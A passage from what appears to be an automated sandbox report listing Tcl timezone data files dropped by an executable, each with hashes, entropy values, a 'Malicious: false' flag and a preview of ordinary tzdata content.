Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:CET) {. {-9223372036854775808 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 1 CEST}. {-766623600 3600 0 CET}. {228877200 7200 1 CEST}. {243997200 3600 0 CET}. {260326800 7200 1 CEST}. {276051600 3600 0 CET}. {291776400 7200 1 CEST}. {307501200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}. {401850000 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET

C:\Users\user\Desktop\tcl\tzdata\CST6CDT Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8227
Entropy (8bit):	3.723597525146651
Encrypted:	false
SSDEEP:	192:KxrIOdXkqbfkeTzZSJw5/9/yuvQ+hcrD57X0N41+IestuNEbYkzbXwDTIRqfhXbo:KxrIOdXkqbfNTzZSJw5/9/yuvQ6crD5r
MD5:	B5AC3FA83585957217CA04384171F0FF
SHA1:	827FF1FBDADDDE3754453E680B4E719A50499AE6
SHA-256:	17CBE2F211973F827E0D5F9F2B4365951164BC06DA065F6F38F45CB064B29457
SHA-512:	A56485813C47758F988A250FFA97E2DBD7A69DDD16034E9EF2834AF895E8A374EEB4DA3F36E6AD80285AC10F84543ECF5840670805082E238F822F85D635651F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:CST6CDT) {. {-9223372036854775808 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-84384000 -18000 1 CDT}. {-68662800 -21600 0 CST}. {-52934400 -18000 1 CDT}. {-37213200 -21600 0 CST}. {-21484800 -18000 1 CDT}. {-5763600 -21600 0 CST}. {9964800 -18000 1 CDT}. {25686000 -21600 0 CST}. {41414400 -18000 1 CDT}. {57740400 -21600 0 CST}. {73468800 -18000 1 CDT}. {89190000 -21600 0 CST}. {104918400 -18000 1 CDT}. {120639600 -21600 0 CST}. {126691200 -18000 1 CDT}. {152089200 -21600 0 CST}. {162374400 -18000 1 CDT}. {183538800 -21600 0 CST}. {199267200 -18000 1 CDT}. {215593200 -21600 0 CST}. {230716800 -18000 1 CDT}. {247042800 -21600 0 CST}. {262771200 -18000 1 CDT}. {278492400 -216

C:\Users\user\Desktop\tcl\tzdata\Canada\Atlantic Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	184
Entropy (8bit):	4.754307292225081
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx02NEO4FVAIg202NEtYF0nalGe2IAcGE2NEOv:SlSWB9IZaM3y7UEO4FVAIgpUEqF0af2b
MD5:	B0E220B9CD16038AAF3EA21D60064B62
SHA1:	333410CB7D4F96EF836CDC8097A1DCE34A2B961A
SHA-256:	6F71D7ED827C9EF6E758A44D2A998673E1225EB8005AD557A1713F5894833F92
SHA-512:	F879F60E36C739280E8FC255D2792BB24BCA90A265F8F90B5FB85630D5A58CE4FDBD24EA5594924375C3CD31DBC6D49C06CBFA43C52D0B9A1E9D799914A164F7
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Halifax)]} {. LoadTimeZoneFile America/Halifax.}.set TZData(:Canada/Atlantic) $TZData(:America/Halifax).

C:\Users\user\Desktop\tcl\tzdata\Canada\Central Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	186
Entropy (8bit):	4.814426408072182
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0po4FVAIg20peRL0nPQox/h4IAcGEpov:SlSWB9IZaM3y7phFVAIgppOL0d490py
MD5:	8374E381BC8235B11B7C5CA215FA112C
SHA1:	181298556253D634B09D72BD925C4DBB92055A06
SHA-256:	1B87273B264A3243D2025B1CFC05B0797CBC4AA95D3319EEE2BEF8A09FDA8CAD
SHA-512:	12800E49B8094843F66454E270B4BE154B053E5FB453C83269AF7C27B965071C88B02AF7BB404E7F5A07277DB45E58D1C5240B377FC06172087BB29749C7543B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Winnipeg)]} {. LoadTimeZoneFile America/Winnipeg.}.set TZData(:Canada/Central) $TZData(:America/Winnipeg).

C:\Users\user\Desktop\tcl\tzdata\Canada\East-Saskatchewan Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	190
Entropy (8bit):	4.860347334610986
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0sAzE5YyVAIg20sAzEvYvW60nbP2/8S64IAcGEsAz1:SlSWB9IZaM3y7hzipVAIgphzGCW60L5X
MD5:	F5CB42BC029315088FAD03C9235FFB51
SHA1:	7773ECE0B85D66E4FA207A26EE4395F38BAC4068
SHA-256:	AF04A4558E31C9864B92FE3403011F7A2FBD837E1314A7BB5AF552D5AED06457
SHA-512:	0533B9D98834866FAA3C6E67A6F61A8A22C2BFDBA8C5336388C0894FBA550611C9112515F17E20E7B3508EC2318D58EA7CA814EC10C3451954C3CC169EDA0F8C
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Regina)]} {. LoadTimeZoneFile America/Regina.}.set TZData(:Canada/East-Saskatchewan) $TZData(:America/Regina).

C:\Users\user\Desktop\tcl\tzdata\Canada\Eastern Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	183
Entropy (8bit):	4.7067203041014185
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0qMKLRXIVAIg20qMKLRI60nbHboxp4IAcGEqMKLRXv:SlSWB9IZaM3y7RQ+VAIgpRQ+60Dboxp2
MD5:	22453AC70F84F34868B442E0A7BDC20A
SHA1:	730049FF6953E186C197601B27AB850305961FD0
SHA-256:	545B992E943A32210F768CB86DEF3203BE956EE03A3B1BC0D55A5CD18A4F064D
SHA-512:	91FE33FAD3954019F632A771BCBD9FF3FDCCDA1F51DD25E0E5808A724F2D9B905E5E2DEE32D415BEA9A9ADB74186D83548584414BB130DF1A166D49373AC7BEF
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Toronto)]} {. LoadTimeZoneFile America/Toronto.}.set TZData(:Canada/Eastern) $TZData(:America/Toronto).

C:\Users\user\Desktop\tcl\tzdata\Canada\Mountain Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	187
Entropy (8bit):	4.768148288986999
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx07nKL5zFVAIg207nKLKN0nNYLo/4IAcGE7nKLun:SlSWB9IZaM3y77GzFVAIgp7DN0W8/49s
MD5:	5E0D3D1A7E9F800210BB3E02DFF2ECD3
SHA1:	F2471795A9314A292DEAA3F3B94145D3DE5A2792
SHA-256:	A8B3A4D53AA1CC73312E80951A9E9CEA162F4F51DA29B897FEB58B2DF3431821
SHA-512:	F80C7CDFE20E5FAD9E4BA457446F067ACE0C3F4659761E3B4A2422D3456CDE92C20589954DE5E0DC64619E3B6AB3A55AE0E0E783F8EFB24D74A5F6DFBF5ABB16
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Edmonton)]} {. LoadTimeZoneFile America/Edmonton.}.set TZData(:Canada/Mountain) $TZData(:America/Edmonton).

C:\Users\user\Desktop\tcl\tzdata\Canada\Newfoundland Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	191
Entropy (8bit):	4.953647576523321
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0tVZMYFwFVAIg20tVZoYvxL0nJBJi6FBx/2IAcGEt3:SlSWB9IZaM3y7tgYmFVAIgptMqL0xdB7
MD5:	3A4E193C8624AE282739867B22B7270A
SHA1:	AC93EEDA7E8AB7E40834FFBA83BAE5D803CB7162
SHA-256:	70EF849809F72741FA4F37C04C102A8C6733639E905B4E7F554F1D94737BF26B
SHA-512:	BE2AACEE2A6F74520F4F1C0CCBBB750ED6C7375D4368023BAB419184F8F717D52981106C03F487B24A943907E60784136C0E5F8C1D5B3D1C67C20E23A4F412B3
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/St_Johns)]} {. LoadTimeZoneFile America/St_Johns.}.set TZData(:Canada/Newfoundland) $TZData(:America/St_Johns).

C:\Users\user\Desktop\tcl\tzdata\Canada\Pacific Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	189
Entropy (8bit):	4.839589386398345
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0oELSTAWFwVAIg20oELSTAQO0L0nie2IAcGEoELSTH:SlSWB9IZaM3y7ZLgXwVAIgpZLgJJL0Nu
MD5:	6AA0FCE594E991D6772C04E137C7BE00
SHA1:	6C53EE6FEBEC2BD5271DD80D40146247E779CB7B
SHA-256:	D2858621DA914C3F853E399F0819BA05BDE68848E78F59695B84B2B83C1FDD2A
SHA-512:	7B354BB9370BB61EB0E801A1477815865FDE51E6EA43BF166A6B1EED127488CC25106DEE1C6C5DC1EF3E13E9819451E10AFBC0E189D3D3CDE8AFFA4334C77CA3
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Vancouver)]} {. LoadTimeZoneFile America/Vancouver.}.set TZData(:Canada/Pacific) $TZData(:America/Vancouver).

C:\Users\user\Desktop\tcl\tzdata\Canada\Saskatchewan Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	185
Entropy (8bit):	4.83938055689947
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0sAzE5YyVAIg20sAzEvYvW60nogS64IAcGEsAzEun:SlSWB9IZaM3y7hzipVAIgphzGCW60Hd9
MD5:	927FD3986F83A60C217A3006F65A3B0A
SHA1:	022D118024BFC5AE0922A1385288C3E4B41903DB
SHA-256:	BB457E954DB625A8606DD0F372DA9BFFAA01F774B4B82A2B1CEE2E969C15ABC3
SHA-512:	3EA932FA5416A9C817977F9D31C8A15C937A453B4D6A6409A7966E76D66A685C91F1117C82BEBEBA2AF5516556DA2BDEC898AD718C78FB8B690F31692174DA6C
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Regina)]} {. LoadTimeZoneFile America/Regina.}.set TZData(:Canada/Saskatchewan) $TZData(:America/Regina).

C:\Users\user\Desktop\tcl\tzdata\Canada\Yukon Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	190
Entropy (8bit):	4.841592909599599
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0peR2pVkvFVAIg20peR2zxL0nTOK8x/h4IAcGEpeRu:SlSWB9IZaM3y7peR2fkvFVAIgppeR2FF
MD5:	9F2A7F0D8492F67F764F647638533C3F
SHA1:	3785DACD1645E0630649E411DC834E8A4FB7F40B
SHA-256:	F2A81B7E95D49CEC3C8952463B727129B4DC43D58ADC64BB7CAB642D3D191039
SHA-512:	0133870BB96851ECD486D55FD10EB4BCB1678772C1BFFADE85FC5644AC8445CDB4C6284BEFFED197E9386C9C6EF74F5F718F2CB43C4C7B8E65FE413C8EC51CD0
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Whitehorse)]} {. LoadTimeZoneFile America/Whitehorse.}.set TZData(:Canada/Yukon) $TZData(:America/Whitehorse).

C:\Users\user\Desktop\tcl\tzdata\Chile\Continental Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	189
Entropy (8bit):	4.762021566751952
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0tfEJ5YyVAIg20tfEJvYvWAt0dKLRMyREGH/h4IAcB:SlSWB9IZaM3y7tfEJHVAIgptfEJAvN0+
MD5:	B2BDB6C027FF34D624EA8B992E5F41AB
SHA1:	425AB0D603C3F5810047A7DC8FD28FDF306CC2DB
SHA-256:	F2E3C1E88C5D165E1D38B0D2766D64AA4D2E6996DF1BE58DADC9C4FC4F503A2E
SHA-512:	6E5A8DC6F5D5F0218C37EE719441EBDC7EDED3708F8705A98AEF7E256C8DC5D82F4BF82C529282E01D8E6E669C4F843B143730AD9D8BBF43BCC98ECB65B52C9B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Santiago)]} {. LoadTimeZoneFile America/Santiago.}.set TZData(:Chile/Continental) $TZData(:America/Santiago).

C:\Users\user\Desktop\tcl\tzdata\Chile\EasterIsland Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	184
Entropy (8bit):	4.758503564906338
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqTQG7ZAJpVAIgObT7ZA6xL0bxOdBx/nUDH7ZAen:SlSWB9IZaM3ycJA3VAIgObJA6xL04dB4
MD5:	E9DF5E3D9E5E242A1B9C73D8F35C9911
SHA1:	9905EF3C1847CFF8156EC745779FCF0D920199B7
SHA-256:	AA305BEC168C0A5C8494B81114D69C61A0D3CF748995AF5CCC3E2591AC78C90C
SHA-512:	7707AC84D5C305F40A1713F1CBBED8A223553A5F989281CCDB278F0BD0D408E6FC9396D9FA0CCC82168248A30362D2D4B27EDEF36D9A3D70E286A5B668686FDE
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Easter)]} {. LoadTimeZoneFile Pacific/Easter.}.set TZData(:Chile/EasterIsland) $TZData(:Pacific/Easter).

C:\Users\user\Desktop\tcl\tzdata\Cuba Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	170
Entropy (8bit):	4.8073098952422395
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx02TEMVFwVAIg202TEKN0lIAcGE2TEMv:SlSWB9IZaM3y76EHVAIgp6EKN0l906Eu
MD5:	BA8EE8511A2013E791A3C50369488588
SHA1:	03BF30F56FB604480A9F5ECD8FB13E3CF82F4524
SHA-256:	2F9DFE275B62EFBCD5F72D6A13C6BB9AFD2F67FDDD8843013D128D55373CD677
SHA-512:	29C9E9F4B9679AFD688A90A605CFC1D7B86514C4966E2196A4A5D48D4F1CF16775DFBDF1C9793C3BDAA13B6986765531B2E11398EFE5662EEDA7B37110697832
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Havana)]} {. LoadTimeZoneFile America/Havana.}.set TZData(:Cuba) $TZData(:America/Havana).

C:\Users\user\Desktop\tcl\tzdata\EET Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7189
Entropy (8bit):	3.6040923024580884
Encrypted:	false
SSDEEP:	96:WB8kMKVCy+Hk+PVqVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lf:AroXPzh2kNU4tB715pyzHy1gA
MD5:	9AE4C7EC014649393D354B02DF00F8B9
SHA1:	D82195DEF49CFFEAB3791EA70E6D1BB8BC113155
SHA-256:	4CB6582052BE7784DD08CE7FD97ACC56234F07BCF80B69E57111A8F88454908E
SHA-512:	6F0C138AF98A4D4A1028487C29267088BD4C0EC9E7C1DB9818FA31A61C9584B67B3F5909C6E6FDB0F7183629E892A77BA97654D39FCE7DDEF6908F8146B7BE72
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:EET) {. {-9223372036854775808 7200 0 EET}. {228877200 10800 1 EEST}. {243997200 7200 0 EET}. {260326800 10800 1 EEST}. {276051600 7200 0 EET}. {291776400 10800 1 EEST}. {307501200 7200 0 EET}. {323830800 10800 1 EEST}. {338950800 7200 0 EET}. {354675600 10800 1 EEST}. {370400400 7200 0 EET}. {386125200 10800 1 EEST}. {401850000 7200 0 EET}. {417574800 10800 1 EEST}. {433299600 7200 0 EET}. {449024400 10800 1 EEST}. {465354000 7200 0 EET}. {481078800 10800 1 EEST}. {496803600 7200 0 EET}. {512528400 10800 1 EEST}. {528253200 7200 0 EET}. {543978000 10800 1 EEST}. {559702800 7200 0 EET}. {575427600 10800 1 EEST}. {591152400 7200 0 EET}. {606877200 10800 1 EEST}. {622602000 7200 0 EET}. {638326800 10800 1 EEST}. {654656400 7200 0 EET}. {670381200 10800 1 EEST}. {686106000 7200 0 EET}. {701830800 10800 1 EEST}. {717555600 7200 0 EET}.

C:\Users\user\Desktop\tcl\tzdata\EST Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	106
Entropy (8bit):	4.879680803636454
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx5yLWkXGm2OHLVvain:SlSWB9X5y2m2OHLViin
MD5:	33221E0807873CC5E16A55BF4450B6D4
SHA1:	A01FD9D1B8E554EE7A25473C2FBECA3B08B7FD02
SHA-256:	5AA7D9865554BCE546F1846935C5F68C9CA806B29B6A45765BA55E09B14363E4
SHA-512:	54A33B239BBFCFC645409FBC8D9DDBFCAE56067FA0427D0BE5F49CB32EB8EEC8E43FC22CE1C083FDC17DD8591BE9DB28A2D5006AFA473F10FB17EF2CE7AED305
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:EST) {. {-9223372036854775808 -18000 0 EST}.}.

C:\Users\user\Desktop\tcl\tzdata\EST5EDT Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8227
Entropy (8bit):	3.723178863172678
Encrypted:	false
SSDEEP:	96:W4UwdaC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:Cwdrn+qvOTFhPI1jFIL
MD5:	1A7BDED5B0BADD36F76E1971562B3D3B
SHA1:	CF5BB82484C4522B178E25D14A42B3DBE02D987D
SHA-256:	AFD2F12E50370610EA61BA9DD3838129785DFDEE1EBCC4E37621B54A4CF2AE3F
SHA-512:	4803A906E2C18A2792BF812B8D26C936C71D8A9DD9E87F7DA06630978FCB5DE1094CD20458D37973AA9967D51B97F94A5785B7B15F807E526C13D018688F16D9
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:EST5EDT) {. {-9223372036854775808 -18000 0 EST}. {-1633280400 -14400 1 EDT}. {-1615140000 -18000 0 EST}. {-1601830800 -14400 1 EDT}. {-1583690400 -18000 0 EST}. {-880218000 -14400 1 EWT}. {-769395600 -14400 1 EPT}. {-765396000 -18000 0 EST}. {-84387600 -14400 1 EDT}. {-68666400 -18000 0 EST}. {-52938000 -14400 1 EDT}. {-37216800 -18000 0 EST}. {-21488400 -14400 1 EDT}. {-5767200 -18000 0 EST}. {9961200 -14400 1 EDT}. {25682400 -18000 0 EST}. {41410800 -14400 1 EDT}. {57736800 -18000 0 EST}. {73465200 -14400 1 EDT}. {89186400 -18000 0 EST}. {104914800 -14400 1 EDT}. {120636000 -18000 0 EST}. {126687600 -14400 1 EDT}. {152085600 -18000 0 EST}. {162370800 -14400 1 EDT}. {183535200 -18000 0 EST}. {199263600 -14400 1 EDT}. {215589600 -18000 0 EST}. {230713200 -14400 1 EDT}. {247039200 -18000 0 EST}. {262767600 -14400 1 EDT}. {278488800 -180

C:\Users\user\Desktop\tcl\tzdata\Egypt Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	165
Entropy (8bit):	4.812476042768195
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqsPHVyVAIgNGE7JW6yCh0DcPHv:SlSWB9IZaM3y7AVAIgNTFW6yg0DY
MD5:	3708D7ED7044DE74B8BE5EBD7314371B
SHA1:	5DDC75C6204D1A2A59C8441A8CAF609404472895
SHA-256:	07F4B09FA0A1D0BA63E17AD682CAD9535592B372815AB8FD4884ACD92EC3D434
SHA-512:	A8761601CD9B601E0CE8AC35B6C7F02A56B07DC8DE31DEB99F60CB3013DEAD900C74702031B5F5F9C2738BA48A8420603D46C3AE0E0C87D40B9D9D44CE0EAE81
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Cairo)]} {. LoadTimeZoneFile Africa/Cairo.}.set TZData(:Egypt) $TZData(:Africa/Cairo).

C:\Users\user\Desktop\tcl\tzdata\Eire Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	167
Entropy (8bit):	4.85316662399069
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxV5QH+owFVAIgoq6QH7W6yMQs/h8QanQHpn:SlSWB9IZaM3ymnQeowFVAIgonQbNyM/R
MD5:	AA0DEB998177EB5208C4D207D46ECCE3
SHA1:	DD8C7CE874EE12DD77F467B74A9C8FC74C7045FF
SHA-256:	16A42F07DE5233599866ECC1CBB1FC4CD4483AC64E286387A0EED1AFF919717D
SHA-512:	D93A66A62304D1732412CAAAB2F86CE5BCD07D07C1315714D81754827D5EFD30E36D06C0DC3CF4A8C86B750D7D6A144D609D05E241FADC7FF78D3DD2044E4CBB
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Dublin)]} {. LoadTimeZoneFile Europe/Dublin.}.set TZData(:Eire) $TZData(:Europe/Dublin).

C:\Users\user\Desktop\tcl\tzdata\Etc\GMT Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	105
Entropy (8bit):	4.883978227144926
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx5yRDMWkXGm2OHvDd:SlSWB9X5yRQCm2OHB
MD5:	94CDB0947C94E40D59CB9E56DB1FA435
SHA1:	B73907DAC08787D3859093E8F09828229EBAA6FD
SHA-256:	17AF31BD69C0048A0787BA588AD8641F1DC000A8C7AEC66386B0D9F80417ABBF
SHA-512:	5F47A2864F9036F3FD61FC65ED4969330DD2A1AC237CB2BD8E972DDFED75120D8D377D5C84060015DCFC163D03F384DC56DC8C6F29E65528C04F1FDA8BBC688E
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT) {. {-9223372036854775808 0 0 GMT}.}.

C:\Users\user\Desktop\tcl\tzdata\Etc\GMT+0 Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	154
Entropy (8bit):	4.862090278972909
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqSsM4DvFVAIgexvqtyRDOm7/8RDMvn:SlSWB9IZaM3yF4FVAIgJtyRSw8RQvn
MD5:	4AC2027A430A7343B74393C7FE1D6285
SHA1:	C675A91954EC82EB67E1B7FA4B0C0ED11AAF83DA
SHA-256:	01EEF5F81290DBA38366D8BEADAD156AAC40D049DBFA5B4D0E6A6A8641D798D1
SHA-512:	61943A348C4D133B0730EAA264A15EF37E0BBE2F767D87574801EAAA9A457DA48D854308B6ABADA21D33F4D498EB748BCB66964EB14BB8DC1367F77A803BA520
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Etc/GMT)]} {. LoadTimeZoneFile Etc/GMT.}.set TZData(:Etc/GMT+0) $TZData(:Etc/GMT).

C:\Users\user\Desktop\tcl\tzdata\Etc\GMT+1 Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	113
Entropy (8bit):	4.981349705962426
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx5yRDOvedSXGm2OH1VnYAv:SlSWB9X5yRSvwJm2OH1VnYK
MD5:	ED439FA2D62624D9616CF1F87C850EA1
SHA1:	D0CF000B89433BF245BD58EB644067B37E108B42
SHA-256:	5E32300CC20CB5CE61BBEFA37D547F765F8B22D9085AD24FC2BA6358233BD0ED
SHA-512:	45D6B20C12FE921A2ACA7EB07792C2F7F4EC77279CF76AA8623F8DC23A306699DAB4920233D8597F7DF5661120F3AC555DBC6C5E72291C5277D102317BC7E008
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+1) {. {-9223372036854775808 -3600 0 GMT+1}.}.

C:\Users\user\Desktop\tcl\tzdata\Etc\GMT+10 Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.95989422353511
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx5yRDOgFkXGm2OH1VyMVCC:SlSWB9X5yRS0m2OH1VyMh
MD5:	AA3C84567F89D180FA967A8E01ED8DB3
SHA1:	1B076494BFAAB46178EFC9602B4CF5E2A62BB6B1
SHA-256:	E6DA2EFC31F04D6C9DFC594D99B4499320D674B00F2A17401792CF663810BFB4
SHA-512:	0F101632AF981E53C0063B59A580034DE789DB4205EDCF7228CF510470AFDF9BFBE17B03C6A4EFA8E5C180F7869F3DE0AE97514D026772734624185B6E826D43
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+10) {. {-9223372036854775808 -36000 0 GMT+10}.}.

C:\Users\user\Desktop\tcl\tzdata\Etc\GMT+11 Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.9977421504796204
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx5yRDOeLXGm2OHaFUYK:SlSWB9X5yRShm2OHaFUL
MD5:	F57A7F84AA6542BBBD7212461380D463
SHA1:	FD192ADF297C09F38312D668E2E2AB569F72544E
SHA-256:	008A6C934B494644990D6A01BA112AFF7C957112EA21276F959B28E3128CB7A6
SHA-512:	ADBC6F509C9745FFC511662D403FC0FABF87C01E2D0F03741D2B10CA1C434890F16F028B9D2D8A7397F156B0EC69438DD4C1A24F675BC113523D9D6DC444646A
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+11) {. {-9223372036854775808 -39600 0 GMT+11}.}.

C:\Users\user\Desktop\tcl\tzdata\Etc\GMT+12 Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.973993120288556
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx5yRDOK/kXGm2OH3FNYMXL:SlSWB9X5yRSKTm2OH3XYM7
MD5:	F2E06CB22EECFCFBF8E6A896CB93D70D
SHA1:	0D6759F9538F9CC7EC4799E80047279C5765FE8F
SHA-256:	3298FBCA6673EA9068CBE030FC6CE663615482C2691BC3FEF0D0C6DCD080749C
SHA-512:	7DEDC53220D6415AE0FE3422C8F2B40F808F8B1BF95DDE24849C1E9834ACD937FA4C702AD20F6D2BCD100CB4450B86FA7A2625F3A55A1B1A8CC4F39383212629
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+12) {. {-9223372036854775808 -43200 0 GMT+12}.}.

C:\Users\user\Desktop\tcl\tzdata\Etc\GMT+2 Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	113
Entropy (8bit):	4.921571940456554
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx5yRDOcFwFFkXGm2OHnF6PCYv:SlSWB9X5yRS0wTm2OHnF6qYv
MD5:	194AF292B3A65A1391A5476B3811EB8E
SHA1:	5DF209458579985955747400645FFBD0E06F2CAE
SHA-256:	56E4205B1BA0C815A557405A270D0A776D1DBC617B493BF7560884358EC694E4
SHA-512:	C2DC980D11604732EB51367008D591C66FB9A8576392A948928CE2C86F6CE7836EA1BDCB2B9F9CF5A1711DA0D6E5AB3E08C433B4D3BA01E68106013A0AE14ED5
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Etc/GMT+2) {. {-9223372036854775808 -7200 0 GMT+2}.}.

C:\Users\user\Desktop\tcl\tzdata\Etc\GMT+3 Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	114
Entropy (8bit):	4.9509374397671495
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx5yRDOCcXGm2OHBFV9bv:SlSWB9X5yRSCTm2OHBFHL
MD5:	F42335C352D791F43042817F35D00440
